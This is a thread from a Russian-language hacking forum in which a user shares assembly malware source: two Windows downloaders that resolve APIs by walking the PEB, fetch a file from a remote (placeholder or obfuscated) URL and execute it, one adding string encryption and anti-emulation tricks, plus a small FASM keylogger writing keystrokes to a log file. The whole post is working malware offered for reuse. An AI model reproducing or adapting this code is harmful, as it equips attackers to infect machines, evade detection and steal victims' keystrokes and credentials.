1
  1. Этот сайт использует файлы cookie. Продолжая пользоваться данным сайтом, Вы соглашаетесь на использование нами Ваших файлов cookie. Узнать больше.
Приветствуем вас,Гость, на форуме IFUD.WS. Обязательно рекомендуется к прочтению правила форума http://ifud.ws/threads/obnovleno-pravila-foruma.7759

Сорцы на asm'e

Тема в разделе "Исходные коды", создана пользователем r00t, 11 май 2012.

  1. TopicStarter Overlay
    r00t

    r00t Гость

    Различные сорцы на асме
    [MASM] Downloader Small
    Код:
    .386
    .model flat, stdcall
    option casemap :none
    .data
    .code
    start:
    call delta_jmp
    delta_jmp:
    pop eax
    mov ebp,eax
    sub ebp,offset delta_jmp
    push ebp
    jmp mDat
    sGetProcAddress db "GetProcAddress",0
    sLoadLibrary db "LoadLibraryA",0
    sUrlMon db "urlmon.dll",0
    sShell32 db "shell32.dll",0
    sURLDownloadToFileA db "URLDownloadToFileA",0
    sShellExecuteA db "ShellExecuteA",0
    sExitProcess db "ExitProcess",0
    sURL db "http://XXX.ru",0
    sFile db "putty.exe", 0
    xUrlMon dd 0
    xShell32 dd 0
    xShellExecuteA dd 0
    xURLDownloadToFileA dd 0
    xExitProcess dd 0
    xGetProcAddress dd 0
    xLoadLibrary dd 0
    xKernelBase dd 0
    mDat:
    pop ebp
    Call cGetProcAddress
    ;GetProcAddress (LoadLibraryA)
    lea eax, [ebp+offset sLoadLibrary]
    push eax
    push [ebp+offset xKernelBase]
    call [ebp+offset xGetProcAddress]
    mov [ebp + offset xLoadLibrary], eax
    ;LoadLibrary urlmon
    lea eax, [ebp+offset sUrlMon]
    push eax
    call [ebp + offset xLoadLibrary]
    mov [ebp + offset xUrlMon], eax
    ;LoadLibrary shell32
    lea eax, [ebp+offset sShell32]
    push eax
    call [ebp + offset xLoadLibrary]
    mov [ebp + offset xShell32], eax
    ;GetProcAddress ShellExecute
    lea eax, [ebp+offset sShellExecuteA]
    push eax
    push [ebp+offset xShell32]
    call [ebp+offset xGetProcAddress]
    mov [ebp + offset xShellExecuteA], eax
    ;GetProcAddress URLDownloadToFile
    lea eax, [ebp+offset sURLDownloadToFileA]
    push eax
    push [ebp+offset xUrlMon]
    call [ebp+offset xGetProcAddress]
    mov [ebp + offset xURLDownloadToFileA], eax
    ;GetProcAddress URLDownloadToFile
    lea eax, [ebp+offset sExitProcess]
    push eax
    push [ebp+offset xKernelBase]
    call [ebp+offset xGetProcAddress]
    mov [ebp + offset xExitProcess], eax
    ;Download File
    push 0
    push 0
    lea eax, [ebp+offset sFile]
    push eax
    lea eax, [ebp+offset sURL]
    push eax
    push 0
    call [ebp + offset xURLDownloadToFileA]
    ;Execute File
    push 0
    push 0
    push 0
    lea eax, [ebp+offset sFile]
    push eax
    push 0
    push 0
    call [ebp + offset xShellExecuteA]
    ;ExitProcess
    push 0
    call [ebp + offset xExitProcess]
    cGetProcAddress:
    assume fs:nothing
    mov esi, FS:30h  
    mov esi, [esi+ 0Ch]   
    mov esi, [esi+ 1Ch]   
    next_module:
    mov eax, [esi+08h]	
    mov edi, [esi+20h]	
    mov esi, [esi]	  
    cmp BYTE PTR [edi+12*2], al
    jne next_module
    cmp BYTE PTR [edi], 6Bh   
    je find_kernel32_finished
    cmp BYTE PTR[edi], 4Bh
    je find_kernel32_finished
    jmp next_module
    find_kernel32_finished:
    mov [ebp+offset xKernelBase], eax
    lea edi, [ebp+offset sGetProcAddress]
    mov ebx, dword ptr [ eax + 3Ch]
    add ebx, eax
    cmp word ptr [ebx], 4550h
    jnz    find_error
    mov    ebx, [ebx+78h]
    add    ebx, eax
    mov    ecx, [ebx+18h]
    dec    ecx
    mov    edx, [ebx+20h]
    add    edx, eax
    find_loop:
    mov    esi, [edx+ecx*4]
    add    esi, eax
    push    edi
    push    eax
    push    ebx
    cmp_loop:
    mov    al, byte ptr [esi]
    mov    bl, byte ptr [edi]
    sub    al, bl
    jne    cmp_different
    add    bl, 0
    jz		  cmp_equal
    inc    esi
    inc    edi
    jmp    cmp_loop
    cmp_different:
    pop    ebx
    pop    eax
    pop    edi
    dec ecx
    cmp ecx, 0
    jne find_loop
    jmp   short find_error
    cmp_equal:
    pop    ebx
    pop    eax
    pop    edi
    mov    edx, [ebx+24h]
    add    edx, eax
    mov    cx, [edx+ecx*2]
    mov    edx, [ebx+1Ch]
    add    edx, eax
    mov    ebx, [edx+ecx*4]
    add    eax, ebx
    push eax
    pop [ebp+offset xGetProcAddress]
    ret
    find_error:
    xor    eax, eax
    ret
    end start
    
    [MASM] Lr Downloader

    Код:
    .486
    .model flat, stdcall
    option casemap :none
    .data
    Host db "Zffb,!![_Y$#) [_SYWeZSU] ge![_Y$#)!+')(!eT)TeY b`Y ",0
    Save db 'c:\1.png ',0
    vers db 'Lr Downloader ',0
    .code
    include kernelbase.asm
    include szTrim.asm
    start:
    call shit
    call antiemul
    push offset Host
    call szTrim
    call DownloadAndExecute
    call exit
    
    DownloadAndExecute:
    push ebp
    mov ebp, esp
    sub esp, 18h
    mov byte ptr [ebp-11],'u'
    mov byte ptr [ebp-10],'r'
    mov byte ptr [ebp-9],'l'
    mov byte ptr [ebp-8],'m'
    mov byte ptr [ebp-7],'o'
    mov byte ptr [ebp-6],'n'
    mov byte ptr [ebp-5],'.'
    mov byte ptr [ebp-4],'d'
    mov byte ptr [ebp-3],'l'
    mov byte ptr [ebp-2],'l'
    mov byte ptr [ebp-1],0
    mov byte ptr [ebp-23],'s'
    mov byte ptr [ebp-22],'h'
    mov byte ptr [ebp-21],'e'
    mov byte ptr [ebp-20],'l'
    mov byte ptr [ebp-19],'l'
    mov byte ptr [ebp-18],'3'
    mov byte ptr [ebp-17],'2'
    mov byte ptr [ebp-16],'.'
    mov byte ptr [ebp-15],'d'
    mov byte ptr [ebp-14],'l'
    mov byte ptr [ebp-13],'l'
    mov byte ptr [ebp-12],0
    push offset vers
    call Crypt
    call GetLoadLibrary
    lea eax, dword ptr [ebp-11]
    push eax
    call edx
    push 092C3D419h
    push eax
    push 0
    call GetProcAddr
    xchg ebx, eax
    push offset Host
    call Crypt
    xor edi, edi
    push edi
    push edi
    push offset Save
    push offset Host
    push edi
    call ebx
    
    call GetLoadLibrary
    lea eax, dword ptr [ebp-23]
    push eax
    call edx
    push 0318A988Bh
    push eax
    push 0
    call GetProcAddr
    xchg ebx, eax
    push 5
    push edi
    push edi
    push offset Save
    push edi
    push edi
    call ebx
    leave
    ret
    Crypt proc p:dword
    mov eax, p
    jmp @@begin
    @@:
    add byte ptr [eax], 14
    inc eax
    @@begin:
    cmp byte ptr [eax], 0
    jnz @b
    ret
    Crypt endp
    
    ;Taken from Win32.Atix
    antiemul:
    push eax
    db 0fh, 02fh, 0c0h; comiss
    xor eax,eax ; junk
    db 0fh, 02ah, 0c0h;cvtpi2ps
    pop eax
    retn
    shit:
    mov ecx,5000000
    _loop:
    sub eax, eax
    push eax
    pop ebx
    xchg eax, ebx
    cmp ecx, 0
    dec ecx
    ja _loop
    retn
    end start[/HTML]
    
    
    
    HTML:
     assume fs: nothing
    ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxx
    GetKernelBase:
    pushad
    mov edx,dword ptr fs:[30h] ;get a pointer to the PEB
    mov edx,dword ptr [edx+0Ch] ;get PEB->Ldr
    mov edx,dword ptr [edx+14h] ;get the first module from the InMemoryOrder module list
    next_mod:
    mov esi,dword ptr [edx+28h]
    push 24
    pop ecx
    xor edi,edi
    loop_modname:
    xor eax,eax
    lodsb
    cmp al,'a' ;some versions of Windows use lower case module names
    jl not_lowercase
    sub al,20h
    not_lowercase:
    ror edi,13
    add edi,eax
    loop loop_modname
    cmp edi,6A4ABC5Bh
    mov ebx,dword ptr [edx+10h]
    mov edx,dword ptr [edx]
    jne next_mod
    mov dword ptr [esp+1Ch],ebx
    popad
    ret
    ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxx
    GetProcAddr:
    push ebp
    mov ebp, esp
    add esp, -014h
    push esi
    push ebx
    push edi
    push edx
    push ecx
    mov eax, dword ptr ss:[ebp+010h]
    xor edx, edx
    xchg eax, edx
    mov esi, 03ch
    add esi, dword ptr ss:[ebp+0ch]
    mov eax, dword ptr ds:[esi]
    add eax, dword ptr ss:[ebp+0ch]
    mov esi, dword ptr ds:[eax+078h]
    add esi, 018h
    add esi, dword ptr ss:[ebp+0ch]
    mov eax, dword ptr ds:[esi]
    mov dword ptr ss:[ebp-014h], eax
    add esi, 4
    lea edi, dword ptr ss:[ebp-8]
    lods dword ptr ds:[esi]
    add eax, dword ptr ss:[ebp+0ch]
    stos dword ptr es:[edi]
    mov dword ptr ss:[ebp-8], eax
    lods dword ptr ds:[esi]
    add eax, dword ptr ss:[ebp+0ch]
    push eax
    stos dword ptr es:[edi]
    mov dword ptr ss:[ebp-0ch], eax
    mov eax, dword ptr ds:[esi]
    add eax, dword ptr ss:[ebp+0ch]
    mov dword ptr ss:[ebp-010h], eax
    pop esi
    mov dword ptr ss:[ebp-4], 0
    local_2:
    mov eax, dword ptr ss:[ebp-4]
    cmp dword ptr ss:[ebp-014h], eax
    jnz local_7
    xor eax, eax
    pop ecx
    pop edx
    pop edi
    pop ebx
    pop esi
    leave
    retn 0ch
    local_7:
    push esi
    mov eax, dword ptr ds:[esi]
    add eax, dword ptr ss:[ebp+0ch]
    xchg eax, edi
    mov ebx, edi
    push edi
    xor al, al
    local_6:
    scas byte ptr es:[edi]
    jnz local_6
    pop esi
    sub edi, ebx
    push edx
    cld
    xor ecx, ecx
    dec ecx
    mov edx, ecx
    local_3:
    xor eax, eax
    xor ebx, ebx
    lods byte ptr ds:[esi]
    xor al, cl
    mov cl, ch
    mov ch, dl
    mov dl, dh
    mov dh, 8
    local_4:
    shr bx, 1
    rcr ax, 1
    jnb local_5
    xor ax, 08320h
    xor bx, 0edb8h
    local_5:
    dec dh
    jnz local_4
    xor ecx, eax
    xor edx, ebx
    dec edi
    jnz local_3
    not edx
    not ecx
    mov eax, edx
    rol eax, 010h
    mov ax, cx
    pop edx
    cmp edx, eax
    je local_1
    pop esi
    add esi, 4
    add dword ptr ss:[ebp-4], 1
    jmp local_2
    local_1:
    pop esi
    mov eax, dword ptr ss:[ebp-4]
    shl eax, 1
    add eax, dword ptr ss:[ebp-010h]
    xor esi, esi
    xchg eax, esi
    mov ax, word ptr ds:[esi]
    shl ax, 2
    add eax, dword ptr ss:[ebp-8]
    xchg eax, esi
    mov eax, dword ptr ds:[esi]
    add eax, dword ptr ss:[ebp+0ch]
    pop ecx
    pop edx
    pop edi
    pop ebx
    pop esi
    leave
    retn 0ch
    ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxx
    GetLoadLibrary:
    call GetKernelBase
    push 04134d1adh
    push eax
    push 0
    call GetProcAddr
    mov edx, eax
    ret
    ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxx
    exit:
    call GetKernelBase
    push 040f57181h
    push eax
    push 0
    call GetProcAddr
    push 0
    call eax
    
    ;xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx xxxxxxxxxxxxxxxxx
    
    From masm32.lib
    HTML:
    szTrim proc srcWORD
    push esi
    push edi
    mov esi, src
    mov edi, src
    xor ecx, ecx
    sub esi, 1
    @@:
    add esi, 1
    cmp BYTE PTR [esi], 32 ; strip space
    je @B
    cmp BYTE PTR [esi], 9 ; strip tab
    je @B
    cmp BYTE PTR [esi], 0 ; test for zero after tabs and spaces
    jne @F
    xor eax, eax ; set EAX to zero on 0 length result
    mov BYTE PTR [edi], 0 ; set string length to zero
    jmp tsOut ; and exit
    @@:
    mov al, [esi+ecx] ; copy bytes from src to dst
    mov [edi+ecx], al
    add ecx, 1
    test al, al
    je @F ; exit on zero
    cmp al, 33 ; don't store positions lower than 33 (32 + 9)
    jb @B
    mov edx, ecx ; store count if asc 33 or greater
    jmp @B
    @@:
    mov BYTE PTR [edi+edx], 0
    mov eax, edx ; return trimmed string length
    mov ecx, src
    tsOut:
    pop edi
    pop esi
    ret
    [/CODE]
    Fasm] Keylogger 1,50 kb
    
    [CODE]
    format PE GUI 5.0
    entry start
    include 'C:\fasm\include\win32a.inc'
    log db "C:\log.txt",0
    buffer db 0x100 dup (?)
    bytes_escritos dd 0
    
    start:
    mov esi,7
    invoke Sleep,1
    jmp gogo
    gogo:
    cmp esi,255
    je start
    inc esi
    invoke GetAsyncKeyState,esi
    cmp eax,0
    jnz logar
    jmp gogo
    logar:
    invoke MapVirtualKey,esi,0
    shl eax,16
    invoke GetKeyNameText,eax,buffer,0x100
    
    invoke  CreateFile, log, GENERIC_WRITE, 0,  NULL, OPEN_ALWAYS, FILE_ATTRIBUTE_ARCHIVE, NULL
    cmp eax,0
    je exit
    mov ebx,eax
    invoke SetFilePointer,ebx,0,0,FILE_END
    invoke lstrlen,buffer
    invoke WriteFile,ebx,buffer,eax,bytes_escritos,NULL
    invoke Sleep,100
    invoke CloseHandle,ebx
    jmp gogo
    exit:
    invoke ExitProcess,0
    
    data import
    library kernel,'KERNEL32.DLL',\
    user,'USER32.DLL'
    import kernel,\
    Sleep,'Sleep',\
    CreateFile,'CreateFileA',\
    WriteFile,'WriteFile',\
    SetFilePointer,'SetFilePointer',\
    CloseHandle,'CloseHandle',\
    lstrlen,'lstrlenA',\
    ExitProcess,'ExitProcess'
    import user,\
    GetAsyncKeyState, 'GetAsyncKeyState',\
    MapVirtualKey,'MapVirtualKeyA',\
    GetKeyNameText,'GetKeyNameTextA'
    end data				  
    [/CODE]
     
    • Like Like x 2
    Метки:

Поделиться этой страницей

Загрузка...